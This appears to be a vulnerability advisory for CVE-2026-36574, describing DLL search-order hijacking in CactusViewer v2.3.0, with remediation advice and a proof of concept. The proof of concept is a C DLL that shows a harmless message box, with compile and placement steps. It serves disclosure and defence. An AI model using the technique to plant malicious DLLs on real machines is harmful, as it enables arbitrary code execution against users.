CVE-2026-36574

An attacker must place a malicious DLL file in the same directory as the CactusViewer executable. This can be achieved through various means, such as delivering a ZIP archive containing both the legitimate executable and the malicious DLL, or by exploiting a shared, user-writable directory. When the user launches CactusViewer.exe, the malicious DLL will be loaded and executed with the user's privileges [ref_id=1].

The vulnerability lies in how CactusViewer.exe loads several DLL files, including D3DCOMPILER_47.dll, d3d11.dll, dxgi.dll, CRYPTSP.dll, d3d10warp.dll, and Wldp.dll. The application searches for these DLLs in its own directory before falling back to the Windows system directory, and none are protected by the KnownDLLs registry key [ref_id=1].

The advisory suggests remediations including using absolute paths for DLL loading with the LOAD_LIBRARY_SEARCH_SYSTEM32 flag, calling SetDllDirectory("") at application startup to remove the current directory from the search order, and using SetDefaultDllDirectories(LOAD_LIBRARY_SEARCH_SYSTEM32) to restrict the default search path. These measures ensure that DLLs are loaded only from trusted system directories, preventing the hijacking of the DLL search order [ref_id=1].

Step 1: Download and extract CactusViewer v2.3.0 to a directory (e.g., C:\Users\<user>\Desktop\CactusViewer\). Step 2: Compile the following proof-of-concept DLL using MinGW: // poc.c - DLL Hijacking Proof of Concept #include <windows.h>

BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) { switch (ul_reason_for_call) { case DLL_PROCESS_ATTACH: MessageBoxA(NULL, "DLL Hijack PoC - Arbitrary Code Execution", "CactusViewer DLL Hijack", MB_OK); break; } return TRUE; }

__declspec(dllexport) void D3DCompile(void) { return; } Compile command (64-bit): x86_64-w64-mingw32-gcc poc.c -shared -o D3DCOMPILER_47.dll Step 3: Place the compiled D3DCOMPILER_47.dll in the same directory as CactusViewer.exe. Step 4: Launch CactusViewer.exe. Step 5: Observe that the MessageBox from the malicious DLL is displayed, confirming arbitrary code execution [ref_id=1].